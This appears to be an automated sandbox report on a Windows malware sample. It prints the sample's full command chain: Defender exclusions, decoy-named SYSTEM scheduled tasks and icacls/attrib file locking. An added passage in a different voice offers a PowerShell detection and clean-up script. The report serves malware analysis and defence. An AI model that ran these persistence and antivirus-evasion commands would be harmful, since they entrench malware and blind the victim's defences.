Malware Analysis Report

2024-09-11 05:28

Sample ID 240620-2ymn3a1gna
Target 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe
SHA256 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9
Tags
discovery execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9

Threat Level: Likely malicious

The file 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery execution exploit

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Views/modifies file attributes

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-20 22:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 22:59

Reported

2024-06-20 23:02

Platform

win7-20240508-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

Signatures

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\stn.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\stn.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\svchost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\svchost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\conhost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\conhost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\anydesk.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /run /tn "MicrosoftEdgeUpdateTaskList"

C:\Windows\system32\taskeng.exe

taskeng.exe {C497B91F-6A43-4058-A890-E23E2564A1EF} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\schtasks.exe

schtasks /run /tn "SystemTaskNavigator"

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\taskeng.exe

taskeng.exe {30602BE2-B25F-48CC-9724-2B6593B707A8} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
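Read as a whole, the process list shows the batch file F6E.bat doing four things in order: it strips any previous copy of itself (takeown, icacls /reset, then a PowerShell rm on each file under C:\ProgramData), adds Defender exclusions for C:\ProgramData and each payload, copies staging binaries from C:\ProgramData\microsoft\ to their final names (each source name is the destination name spelled backwards: nts -> stn, tsohcvs -> svchost, tsohnoc -> conhost, ksedynA -> Anydesk), registers five ONLOGON tasks with /RL highest (four of them /RU SYSTEM) and starts two of them, then locks the files with attrib +r +s, SYSTEM ownership and explicit deny ACEs for delete, write and write-DAC. The Files section records only the batch file, so the staging binaries were not present in this detonation and there are no payload hashes to pivot on. The script below is an added hunting and clean-up example, not code from the report or the sample: the task names and paths come from the report, while the -Remediate switch, the Get-ReversedStagingPath helper and the assumption of an elevated PowerShell 5.1+ session with the ScheduledTasks and Defender modules (Windows 8 or later; on Windows 7, as in behavioral1, use schtasks /query /fo LIST /v instead) are mine.

```powershell
# Added hunting/clean-up example for the F6E.bat persistence chain; not code
# from the report or the sample. Assumes an elevated PowerShell 5.1+ session
# with the ScheduledTasks and Defender modules (Windows 8 or later).
param(
    [switch]$Remediate   # assumption: also remove tasks, exclusions and files
)

# Task name -> /TR target, copied from the schtasks /Create lines in the report.
# ruh.exe is only ever referenced by its task; the report shows no copy for it.
$Tasks = @{
    'SystemTaskNavigator'         = 'C:\ProgramData\stn.exe'
    'MicrosoftEdgeUpdateTaskList' = 'C:\ProgramData\Anydesk.exe'
    'OneDriveTaskReport'          = 'C:\ProgramData\svchost.exe'
    'MicrosoftUpdateScheduler'    = 'C:\ProgramData\conhost.exe'
    'RestUpdaterHost'             = 'C:\ProgramData\microsoft\ruh.exe'
}

# The Copy-Item sources are the deployed basenames reversed (nts -> stn,
# tsohcvs -> svchost, tsohnoc -> conhost, ksedynA -> Anydesk), so derive them.
function Get-ReversedStagingPath([string]$DeployedPath) {
    $chars = [IO.Path]::GetFileNameWithoutExtension($DeployedPath).ToCharArray()
    [array]::Reverse($chars)
    Join-Path 'C:\ProgramData\microsoft' ((-join $chars) + '.exe')
}

$Paths = @($Tasks.Values) + @(
    $Tasks.Values | Where-Object { $_ -notlike '*\microsoft\*' } |
        ForEach-Object { Get-ReversedStagingPath $_ })

# 1. Scheduled tasks: the five known names, plus any task that runs from ProgramData
#    (the batch registers them with forward slashes, which -like still matches).
$taskHits = Get-ScheduledTask | Where-Object {
    $Tasks.ContainsKey($_.TaskName) -or
    ($_.Actions | Where-Object { $_.Execute -like 'C:\ProgramData*' })
}
$taskHits | ForEach-Object {
    [pscustomobject]@{
        Task    = $_.TaskName
        RunAs   = $_.Principal.UserId
        Level   = $_.Principal.RunLevel
        Execute = ($_.Actions | ForEach-Object { $_.Execute }) -join ' '
        State   = $_.State
    }
} | Format-Table -AutoSize

# 2. Defender exclusions added with Add-MpPreference.
$mp = Get-MpPreference
$exclPaths = @($mp.ExclusionPath    | Where-Object { $_ -like 'C:\ProgramData*' })
$exclProcs = @($mp.ExclusionProcess | Where-Object { $_ -like 'C:\ProgramData*' })
$exclPaths | ForEach-Object { "ExclusionPath:    $_" }
$exclProcs | ForEach-Object { "ExclusionProcess: $_" }

# 3. Files: attrib +r +s, SYSTEM owner and explicit Deny ACEs are the lock signature.
#    Get-Acl still works because READ_CONTROL is not among the denied rights.
foreach ($p in $Paths) {
    if (-not [IO.File]::Exists($p)) { continue }
    $item = Get-Item -LiteralPath $p -Force     # -Force: needed for system/hidden files
    $acl  = Get-Acl  -LiteralPath $p
    [pscustomobject]@{
        Path       = $p
        Attributes = $item.Attributes
        Owner      = $acl.Owner
        DenyACEs   = ($acl.Access | Where-Object { $_.AccessControlType -eq 'Deny' } |
                      ForEach-Object { "$($_.IdentityReference):$($_.FileSystemRights)" }) -join '; '
        SHA256     = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
    } | Format-List

    if ($Remediate) {
        # The same unlock recipe the batch applies to its own previous install:
        # retake ownership (SeTakeOwnershipPrivilege bypasses the DACL), reset the
        # DACL (the new owner holds WRITE_DAC implicitly), clear +r +s, delete.
        takeown.exe /f $p | Out-Null
        icacls.exe  $p /reset | Out-Null
        attrib.exe -r -s $p
        Remove-Item -LiteralPath $p -Force
    }
}

if ($Remediate) {
    $taskHits | Unregister-ScheduledTask -Confirm:$false
    $exclPaths | ForEach-Object { Remove-MpPreference -ExclusionPath    $_ }
    $exclProcs | ForEach-Object { Remove-MpPreference -ExclusionProcess $_ }
}
```

Run it without arguments to report, and with -Remediate (as an administrator) to unregister the tasks, drop the exclusions and delete the files; the unlock order matters, because the deny ACEs block delete and write-DAC until ownership has been retaken. For retrospective detection the same chain is visible in the event logs: Security 4698 (scheduled task created, if "Audit Other Object Access Events" is enabled), Microsoft-Windows-Windows Defender/Operational 5007 (configuration change, which covers Add-MpPreference), and process-creation events (Security 4688 or Sysmon 1) showing cmd.exe spawning takeown, icacls and powershell in the repeated triplets listed above.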

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat

MD5 71d06b71522b0ecd9e42ee36b73a8976
SHA1 5615791d6e861b721e9945d55a0946f4e51d0302
SHA256 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0
SHA512 f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84

memory/2368-6-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

memory/2368-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/2368-8-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/2368-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-13-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-12-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-14-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKREIYQYHA5FFTSKC0R8.temp

MD5 9c7ee159aaa9f81e64626f1dd77faee8
SHA1 238e19a07b69168e36b84f97a41ec1fb4bf7b934
SHA256 543a9dc963592001e404058efb76b87dde2c711445be13a356b27ca2ab6be211
SHA512 27d0d34d84207b36c5a553e2cebe5bc2f4b64730b0a3326c3dbe4f4cc5f2b248019554425d961a7de6fa119d48957be1dc062b224c4d9a06ca075568e1fc3c8a

memory/2596-20-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2596-21-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
